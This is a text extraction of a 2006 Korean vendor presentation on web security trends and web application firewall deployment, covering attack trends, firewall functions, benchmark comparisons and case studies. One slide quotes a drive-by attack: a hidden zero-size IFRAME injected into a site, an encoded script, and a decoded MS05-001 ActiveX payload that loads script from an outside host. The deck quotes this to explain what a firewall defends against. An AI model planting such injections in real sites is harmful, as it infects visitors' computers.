![Page 1: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/1.jpg)
웹 보안 동향 및 웹 방화벽 구축 전략
2006. 12. 7. 파이오링크기술지원센터최성열센터장([email protected])
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 2: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/2.jpg)
웹웹 보안보안 동향과동향과 피해피해 사례사례
보안보안 최고최고 이슈이슈 ‘‘웹방화벽웹방화벽’’IIII
II
차 례
주요주요 구축구축 사례사례IVIV
차세대차세대 웹웹 방화벽이란방화벽이란??IIIIII
pdfFactory 평가판에서 만든 PDF 낄’’’언허답록원‘좌허좌답응언주답언조특
![Page 4: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/4.jpg)
WEB은 왜 취약한가?
• 구조적인 취약성– 접근성: 내부 DB 시스템까지 접근하는 유일한 통로.
(기존 방화벽은 port 80/443를열어놓음)
– 모듈화: 3-tier의 별도의모듈이결합되고 Third Party에 의해 개발됨.
– 원격 제어: 원격의사용자에 입력에 따라명령어수행.
DB
DB
Web appWebClient
Web appWeb appWeb app
HTTP request(cleartext or SSL)
HTTP reply (HTML, Javascript, VBscript,
etc)
Websphere, OAS, Weblogic, JSP, Netscape, Perl,C/C++, etc
Apache, IIS, IBM, Sun, Zeus, etc
Oracle, MS-SQL, Informix, MySQLPostgreSQL, Sybase, etc
Connector
Connector
IE, Firefox, Netscape,
Oprea
WebServer
방화벽/IPS
ADO, ODBC, etc..
3 Tier Architecture
pdfFactory 평가판에서 만든 PDF ÿ www.softvision.co.kr
![Page 5: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/5.jpg)
• 해킹 사고의 유형– 해킹사고의 유형 중 70%이상이웹취약성을 대상으로함.
• 목적의이동– 사이버머니, 온라인게임, 인터넷뱅킹, 쇼핑몰증가, EC 활성화– 단순 호기심, 정보 획득 -> 정치적, 경제적, 사회적 목적化
웹 해킹의 동향
호기심,
과시욕,
취미
경제적
정치, 군사적
사회적
SHIFT
사이버머니 탈취
계정 도용, 탈취
콘텐츠탈취
홈페이지변조
게시판도배
DoS/DDoS 공격
HTTP (Port 80)NETBIOS (Port 139)Microsoft-DS (Port 445)Location Service (Port 135)ICMPOther
Source : Network World August 2003
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 6: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/6.jpg)
주요 해킹 방법
최근 금전적인 이익을 목적으로 시도되는 중국발 해킹 공격이나 피싱(Phishing) 공격이 꾸준히 증가,
해당 서버를 침해시키기 보다 신뢰성을 이용하여 보안에 취약한 사용자를 공격하는 매개체로 활용
중국발해킹공격
MS 취약점을이용한Zero Day 공격
피싱기법을이용한End-User 공격
ActiveX 를이용한공격
q 홈페이지의권한획득이후 IFRAME, 소스변조등의공격을통해악성프로그램유포및개인정보수집
q패치가발표되기전 MS 취약점이용공격 코드생성및악용
q금전적획득목적의 프로해커들에의한 해킹침해사례발생
q스크립트, URL 스푸핑, 눈속임등을통한공격q주로금융권, 온라인게임의사이버머니및 아이템불법
획득이표적이되고있음
q홈페이지의권한획득이후또는접근가능한서비스를이용해
피싱이나웜바이러스의유포경로로사이트악용하거나
악성프로그램유포및개인정보수집
금전적인이익을위한End-User PC 공격에주로활용
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 7: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/7.jpg)
중국 발 해킹 시나리오
최근 중국측에서 홈페이지 변조 후 홈페이지 메인 페이지에 IFRAME을 삽입시켜 해커 컴퓨터의 특정
악성 페이지를 열람하도록 하여 일반 사용자가 변조된 홈페이지 방문 시 악성 프로그램이 설치되는
기법들을 주로 사용.
악의적인사용자(Cracker)
INTERNET
해킹 후악성 스크립트삽입1
신뢰있는기업의홈페이지서버
http://www.xxxx.com/code.html
공격자홈페이지에있는공격코드
<HTML><script
type="text/JScript.Encode">#@~^2REAAA==@!eO R@#@&7lD,3 z?DD~',J)$;f2w!C&9|d\HrhJ,_@#@&
E}"?Pjj(I}C81N+WE,_@#@&rL4k%0VsxWa;MdY!\E�P3@#@&ES6X.TFy&cl {%O_JJ~_@#@&r'Ei@#@&
0!x^ObWx~n ��mGN W`r w!Y#,@#@&k -
� �CVbN,4C/n WP^tm.l1Yn.kPkU~DtnPbUaEO,Y 6Yc-EP3@#@&Jjlsr9P4md++cP14CDm
mD+./~CM+~b t~,lR"BP!
- Javascript.Encode로인코딩된것을확인
<OBJECT id="cnbore2" type="application/x-oleobject“classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">.............<PARAM name="Item1"
value='command;javascript:eval("document.write(\"<SCRIPT src=\\\"http://www.hackxxxx.com/xxxxx/bbs003302.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'>
Decoding된공격코드decoding
- MS05-001 HTML Help Control ActiveX 취약점이용한 공격코드
사이트이용자
사이트 방문시악성코드 감염2
사용자 정보획득3
악성 IFRAME 삽입
IFRAME TAG 삽입</map><% 'Server.Execute "FX_xxxx.asp" %><!-- // --><iframe
src="http://www.xxxx.com/code.html" width="0" height="0"></iframe>
</body></html>
pdfFactory 평가판에서 만든 PDF = www.softvision.co.kr
![Page 13: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/13.jpg)
클라이언트 웹서버사용자요청User Request
서버응답Server Reply
검사를통과한요청
검사를통과한응답
검사를통과한응답
사용자요청User Request
1. 요청검사
4. 적응학습
2. 컨텐츠보호
3. 위장
어플리케이션접근제어폼필드검사과다요청제어(Web DoS)쿠키보호버퍼오버플로우차단SQL/스크립트차단업로드파일/요청형식검사검사회치차단
어플리케이션접근제어학습폼필드학습쿠키학습SQL/스크립트(XSS) 학습쉘코드학습
URL 정보위장서버정보위장
신용카드정보유출차단주민등록번호유출차단계좌번호유출차단웹변조방지
응답형식검사코드노출차단
웹방화벽
웹 방화벽의 주요기능
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 14: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/14.jpg)
클라이언트 웹 서버
웹 방화벽의 동작 원리
SYN
SYN + ACK
ACK
GET/PUSH/POST
GET/PUSH/POST (Request)
웹 방화벽
SYN + ACK
ACK
SYN
Data (Response)
FIN
FIN + ACK
ACK
FIN
FIN + ACK
ACK
• 보안 OK: 웹서버 전달
• 보안 No: 차단
• 보안 OK: 웹서버 전달
• 보안 No: 차단
Data (Response)
• 보안 OK: 클라이언트 전달
• 보안 NO: 차단
* 필요시 데이터 변경 후 전달
• 보안 OK: 클라이언트 전달
• 보안 NO: 차단
* 필요시 데이터 변경 후 전달
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 15: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/15.jpg)
클라이언트 웹 서버
웹 방화벽의 테이터 분석 범위
웹 방화벽
요청시
응답시
보안 정책에 따라 요청/응답의 데이터
부분까지 확인해야 하므로 성능/안정
성을 기반으로 한 구현 필요
pdfFactory 평가판에서 만든 PDF 껿’’’언허답록원‘좌허좌답응언주답언조특
![Page 16: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/16.jpg)
웹 방화벽의 성능 차이
ClientClient ServerServer
WEBFRONTWEBFRONT
ClientClient ServerServer
기존 Proxy 방식• C/S 개의 Socket 통신에 대한 overhead• 모든 커넥션이 Network Stack을 거치면서발생하는 Overload
-> 고성능 H/W로도 성능의 한계
성능저하
State Machine 기반 처리 방식• 단순화된 Sate Machine 기반의 Delay
Binding 구현• TCP Overhead/Network Stack 단순화-> 고성능 서비스 가능* 특허출원번호 : 제 10-2004-0048404호
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 17: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/17.jpg)
국산 vs 외산 비교
2004년쯤 국내에 소개된 웹 방화벽 제품은 외산이 처음 소개가 되었으며 2005년 부터 국산 제품들이차별화를 선언하며 시장에 선보이게 됨.
고객선호조건불가가능커스터마이징
(고객요구수용)
국내고객선호불가가능한글지원
공공/교육기간진입장애불가가능보안성검토/인증
관리편의성
성능
중상중상보안기능
서버(SW)어플라이언스
스위치
서버(SW)어플라이언스
스위치
제품타입
3~4년1~2년생성시기
비고외산국산구분
pdfFactory 평가판에서 만든 PDF ÿ www.softvision.co.kr
![Page 19: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/19.jpg)
차세대 웹 방화벽의 도입 시 고려사항
Feature 4
Feature 3
Feature 2
Feature 1① 성능/안정성 (다양한 정책 상태에서)
② 네트워크 구성의유연성(TP, 포트(Copper/Fiber), HA)
③ 관리의 편의성(한글화, GUI 편의성)
④ 기술력(개발, 현장지원)
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 20: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/20.jpg)
보안정책 전/후의 성능 차이
0
20,000
40,000
60,000
80,000
100,000
파이오링크 F사 M사 P사
TPS (Transaction per Second)
정책전
정책설정후
05,0006,40045,000정책설정 후
100%44%92%25%변화율(%)
10,0009,00085,00060,000정책 전
P사M사F사파이오링크구분
웹 방화벽 특성상 정책 설정전의 기본성능과 보안정책 적용후의 성능 저하에 대한 충분한 검토 필요
기본 성능은 뛰어나나 정책적용
시 터무니 없는 성능 저하율 보임
기본 성능은 뛰어나나 정책적용
시 터무니 없는 성능 저하율 보임
기본 성능이 너무 낮음기본 성능이 너무 낮음
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 23: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/23.jpg)
A사 구축사례 특징
제품 선정 과정 구축 방향
• 국내 최대 무선 Telco. 사업자로서, 국내외 WAF Solution 중 8개사를 대상으로 제품 선정 작업 실시• 국내 WAF BMT 사상 처음으로 2GB 성능부하 측정• NSS/OWASP/WASC 등의 객관적 국제 평가 기준을 적용 기능 평가• Decision Factors for WAF : 성능/안정성, 보안성, 확장성,객관성
ü 성능 측정 : NSS WAF Test 방법론 V 1.0 기반ü 보안기능측정
NSS와OWASP를 기반으로 가상 웹 APP.자체 준비Blind Test 방식으로 취약점 진단과 정책수립 수행ü 관리기능 측정 : WASC의 WAF 평가 요소 기반
ü Target : 대외 서비스 목적의 약 90여대 서버를 보호ü 구성 : Active-StandBy, 2GB NW, WEBFRONT 2대ü 구축 소요 예상 기간 : 약 3개월ü 추진 방법론 : 취약점 분석팀이 취약점 분석 후,WAF 기술팀과 함께 정책 개발, 시험 적용 및 실적용
웹 방화벽 도입사례 I (S사)
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 24: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/24.jpg)
B사 구축사례 특징
제품 선정 과정 구축 방향
• 국내 최대 유선 Telco. 사업자로서, 국내 WAF Solution 중 3개사를 대상으로 제품 선정 작업 실시• WAF BMT시 1GB 성능 부하 측정, Active-Active HA 구성• NSS/OWASP/WASC 등의 객관적 국제 평가 기준을 활용 기능 평가• Decision Factors for WAF : 성능,안정성, 보안성
ü 성능 측정 : 동일 Web 서버를 APPSCAN 후, 동일정책 설정 후, Avalanche를 이용 1K,10K,20K측정ü 보안기능측정 :WebGoat 을 이용 보안 기능ü 관리기능 측정 : WASC의 WAF 평가 요소 기반
ü Target : 대외 서비스 목적의 약 100여대 서버를 보호ü 구성 : Active-Active, 1GB NW, WEBFRONT 4대ü 구축 소요 예상 기간 : 약 2개월ü 추진 방법론 : 취약점 분석팀이 취약점 분석 후,WAF 기술팀과 함께 정책 개발, 시험 적용 및 실적용
웹 방화벽 도입사례 II (K사)
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 25: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/25.jpg)
마치며
• 웹 방화벽 도입은 보안성/안정성/(관리)편의성 등 여러가지 관점에 신중히….
- 신중한 검토 없이 도입한 많은 고객이 이미 ‘속물’로 취급하는 경우 다수
• 제품 도입 전 충분한 검증을 통해 도입 결정 (실망 / 로컬 BMT)
- 신뢰할 수 있는 제품 도입을 위해서는 담당자의 노력이 필요
• 보안성 검토/CC 인증과 웹 방화벽 제품에 대한 정확한 인식 필요
- Gateway 방식의 제품 중에는 현재 인증을 받은 제품 없음 (국산제품들이 진행 중)
- SW 방식(현재 유일 1개 제품)도 현재 대학교에서 많이 사용하는 Linux/Unix(Sun등)/MS 용
제품은 없으므로 도입 유의
- 웹스캐너는 차단 제품이 아니라 취약점을 검사하는 툴이므로 웹 방화벽과 무관함.
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr
![Page 26: 웹보안동향및웹방화벽구축전략 - cfs4.tistory.comcfs4.tistory.com/upload_control/download.blog?f... · ActiveX 를이용한공격 q홈페이지의권한획득이후IFRAME,](https://reader033.vdocuments.site/reader033/viewer/2022041701/5e41cea84139db56891b440e/html5/thumbnails/26.jpg)
Sales : [email protected] Assistance : [email protected]
We will promise your success!
프로모션
금일 참석 고객 중 원하시는 3 고객에 한해서 메인 웹 서비스에 대한
원격 취약점 분석 서비스를 무료로 제공해 드립니다.
자세한 사항은 아래 메일로 문의해 주십시오.
pdfFactory 평가판에서 만든 PDF www.softvision.co.kr